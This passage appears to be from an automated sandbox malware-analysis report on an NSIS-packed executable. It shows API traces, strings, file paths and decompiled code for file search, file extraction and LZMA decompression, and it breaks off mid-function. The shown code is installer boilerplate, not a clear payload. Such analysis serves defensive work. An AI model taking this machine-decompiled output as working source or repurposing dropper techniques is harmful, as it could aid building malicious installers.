0x00405707
0x0040570c
0x0040570f
0x00405722
0x00405724
0x00405729
0x00405730
0x0040574b
0x00405750
0x00405752
0x00405776
0x00405754
0x00405754
0x00405757
0x0040576b
0x00405759
0x0040575c
0x00405764
0x00405764
0x00405757
0x00405732
0x00405738
0x0040573a
0x00405740
0x00405740
0x0040573a
0x00000000
0x00405730
0x00405711
0x00405714
0x00405716
0x00000000
0x00000000
0x00405718
0x0040571a
0x00000000
0x00000000
0x0040571c
0x00405720
0x00000000
0x00000000
0x00000000
0x0040577b
0x00405785
0x0040578b
0x0040578b
0x00405796
0x00000000
0x00405796
0x004056b2
0x004056b9
0x00000000
0x00000000
0x00000000
0x00405677
0x00405677
0x00405679
0x004057a6
0x004057a8
0x004057ab
0x004057fc
0x004057fc
0x004057fc
0x004057ad
0x004057b0
0x004057bb
0x004057c0
0x004057c2
0x00000000
0x00000000
0x004057c5
0x004057d1
0x004057d6
0x004057d8
0x00000000
0x004057f3
0x004057da
0x004057dd
0x00000000
0x00000000
0x004057e2
0x00000000
0x004057e9
0x004057b2
0x004057b2
0x00000000
0x004057b2
0x0040567f
0x00405682
0x00000000
0x00000000
0x00000000
0x00405682

APIs

DeleteFileA.KERNELBASE(?,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405658
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056A0
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056C1
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056C7
FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056D8
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405785
FindClose.KERNEL32(00000000), ref: 00405796

Strings

\*.*, xrefs: 0040569A
C:\Users\user\AppData\Local\Temp\, xrefs: 0040563C
"C:\Users\user\Desktop\wLlREXsA9M.exe", xrefs: 0040562F

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\wLlREXsA9M.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-665702937
Opcode ID: 0fddd6838e68b5216458d227fb5852cbd05868e355d95de33fa072e0eda16e98
Instruction ID: c5d683bd7205e6742442037d956b0ca684518608fd51e182dfd0a362721cab18
Opcode Fuzzy Hash: 0fddd6838e68b5216458d227fb5852cbd05868e355d95de33fa072e0eda16e98
Instruction Fuzzy Hash: FE51B270804A04EADB21AB618C85FBF7AB8DF42714F14817BF455B21D2D77C4982AF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402ACE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040586C(_t82);
				_push(_t82);
				_t83 = "Call";
				if(_t33 == 0) {
					lstrcatA(E004057FF(E00405D8D(_t83, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest\\Narkocentret")), ??);
				} else {
					E00405D8D();
				}
				E00405FF8(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00406091(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004059DB(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405A00(_t83, "true", (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404FA6(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423788;
						goto L32;
					} else {
						E00405D8D(0x409be8, 0x424000);
						E00405D8D(0x424000, _t83);
						E00405DAF(_t75, 0x409be8, _t83, "C:\Users\Arthur\AppData\Local\Temp\nssF823.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405D8D(0x424000, 0x409be8);
						_t62 = E00405583("C:\Users\Arthur\AppData\Local\Temp\nssF823.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423788 =  &( *0x423788->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E00404FA6();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404FA6(0xffffffea,  *(_t85 - 8)); // executed
				 *0x4237b4 =  *0x4237b4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402F33(); // executed
				 *0x4237b4 =  *0x4237b4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405DAF(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E00405DAF(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405583();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x00401775
0x0040177c
0x00401798
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x00402729
0x00402729
0x0040295e
0x00402961
0x00402961
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402967
0x00402967
0x00402967
0x00401858
0x00401858
0x00401859
0x00401492
0x004022dd
0x004022dd
0x004022dd
0x00401856
0x0040184f
0x00402969
0x0040296d
0x0040296d
0x00401883
0x00401888
0x0040188e
0x0040188f
0x00401890
0x00401893
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x004022d8
0x00000000
0x004022d8
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405D8D: lstrcpynA.KERNEL32(?,?,00000400,0040321B,00422F00,NSIS Error), ref: 00405D9A

Part of subcall function 00404FA6: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00403063,00000000,?), ref: 00404FDF
Part of subcall function 00404FA6: lstrlenA.KERNEL32(00403063,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00403063,00000000), ref: 00404FEF
Part of subcall function 00404FA6: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00403063,00403063,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,0040E8C0,00000000), ref: 00405002
Part of subcall function 00404FA6: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll), ref: 00405014
Part of subcall function 00404FA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040503A
Part of subcall function 00404FA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405054
Part of subcall function 00404FA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405062

Strings

Call, xrefs: 00401775, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nssF823.tmp, xrefs: 004017A3, 00401812, 00401830
C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nssF823.tmp$C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret$Call
API String ID: 1941528284-772898861
Opcode ID: 195bd75c353741a947614a0485efc75b6aacff13181865b2bbb4b34ffc173464
Instruction ID: 511ec708cf373b53eb7b33b9092a3734beee2b55a170786f23e72164bceefcb6
Opcode Fuzzy Hash: 195bd75c353741a947614a0485efc75b6aacff13181865b2bbb4b34ffc173464
Instruction Fuzzy Hash: 2941C672A00515BACF107FB5DC49DAF3679EF45369B20823BF521F20E1D63C8A419A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004063D8 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E004063D8() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406C7B))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc("true", 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc("true",  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
